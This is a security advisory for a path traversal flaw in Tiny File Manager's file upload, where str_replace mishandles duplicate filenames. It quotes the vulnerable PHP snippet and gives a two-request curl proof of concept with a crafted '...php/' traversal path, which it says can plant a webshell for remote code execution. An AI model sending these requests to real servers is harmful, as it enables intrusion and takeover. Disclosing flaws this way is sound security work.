Description

A Path Traversal vulnerability exists in Tiny File Manager, which allows the upload of files to an arbitrary location in the server. This flaw derives from the way that the file upload/creation is handled when a file with the same name already exists in the target directory.

Affected Code Snippet

// tinyfilemanager.php
// ... snippet ...
if(file_exists ($fullPath) && !$override_file_name) {
       $ext_1 = $ext ? '.'.$ext : '';
       $fullPath = str_replace($ext_1, '', $fullPath) .'_'. date('ymdHis'). $ext_1;
}
// ... snippet ...

If we look at how str_replace is used to separate the old filename from its extension, we can see that it will in fact remove all occurrences of the extension from the whole fullpath parameter. Therefore, if an attacker sends, for example, two consecutive requests with fullpath ...php/...php/...php/...php/...php/var/www/html/benign.php and filename shell.php, it will move the uploaded file to ../../../../../var/www/html/benign_<DATE>.php.

Proof of Concept

curl -s -H 'Cookie: filemanager=<SESSIONID>' -F'[email protected]' -F'fullpath=...php/...php/...php/...php/...php/var/www/html/benign.php' <HOST>
curl -s -H 'Cookie: filemanager=<SESSIONID>' -F'[email protected]' -F'fullpath=...php/...php/...php/...php/...php/var/www/html/benign.php' <HOST>

Impact

By leveraging this vulnerability to upload a webshell, it’s possible to achieve RCE in the server/container.